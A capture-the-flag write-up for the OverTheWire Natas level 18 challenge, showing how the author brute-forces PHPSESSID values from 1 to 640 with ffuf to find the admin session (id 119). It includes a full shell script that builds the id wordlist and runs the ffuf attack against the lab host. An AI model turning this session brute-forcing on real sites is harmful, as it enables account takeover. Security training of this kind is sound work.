Level 17 - Level 18
Last updated
This time we get a login page and a link to the source code. The page mentions that we have to log in as the admin to get the password for the next level.
On checking the source code, we can see the maxid variable, which defines the maximum number of users (in this case 640), and that the function my_session_start looks for a session cookie named PHPSESSID.
Let's try to log in with some random credentials. The application responds: "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19".
I captured the above login attempt with Burp Suite. On checking it, the response to the login request set a cookie, PHPSESSID=184.
So I decided to brute force this cookie value to find the admin's session id. For that, I first created a wordlist containing all the possible user ids (since we know the maximum number of users is 640).
Next, I used ffuf to brute force the cookie value with the wordlist generated above, using the following command.
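The wordlist generation and an ffuf invocation of the kind described above, as an added example rather than the original post's own command. The target URL, the HTTP basic-auth user natas18 (password taken from the NATAS18_PASS environment variable) and the exact banner text used as the filter are assumptions; ffuf's `-b` supplies the cookie with the FUZZ keyword, and `-fr` drops every response matching the regex, so the only line left in the output is the candidate whose page does not say "regular user":

```shell
#!/bin/sh
# Added example (not from the original writeup): enumerate candidate
# PHPSESSID values 1..maxid and let ffuf report the one whose response
# lacks the "regular user" banner. Host, level name and banner text are
# assumptions about how the level is reached; adjust them to the target.

TARGET="http://natas18.natas.labs.overthewire.org/index.php"   # assumed URL
LEVEL_USER="natas18"                                          # assumed basic-auth user
MAX_ID=640                                                    # maxid from the level's source
MARKER="You are logged in as a regular user"                  # banner in non-admin responses

# Write one candidate session id per line: 1..MAX_ID.
make_wordlist() {
    out="$1"
    seq 1 "$MAX_ID" > "$out"
}

# Run ffuf over the cookie value, filtering out every response that still
# contains MARKER; whatever remains is the admin session id. Needs the
# level password in NATAS18_PASS (for basic auth) and ffuf on PATH.
brute_session() {
    wordlist="$1"
    auth=$(printf '%s:%s' "$LEVEL_USER" "$NATAS18_PASS" | base64 | tr -d '\n')
    ffuf -w "$wordlist" \
         -u "$TARGET" \
         -H "Authorization: Basic $auth" \
         -b "PHPSESSID=FUZZ" \
         -fr "$MARKER"
}

# Only fire the requests when we actually have a password and the tool.
if [ -n "${NATAS18_PASS:-}" ] && command -v ffuf >/dev/null 2>&1; then
    make_wordlist /tmp/ids.txt
    brute_session /tmp/ids.txt
fi
```

Filtering on the banner rather than on status code or response size is deliberate: every id returns HTTP 200, and sizes can drift by a few bytes, so the text that is present for regular users and absent for the admin is the only stable discriminator.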
From the result of the above ffuf command, we can see that 119 was the only id whose response did not contain the line "You are logged in as a regular user."
So I tried logging in with a session id of 119; it worked, and I got the password for the next level.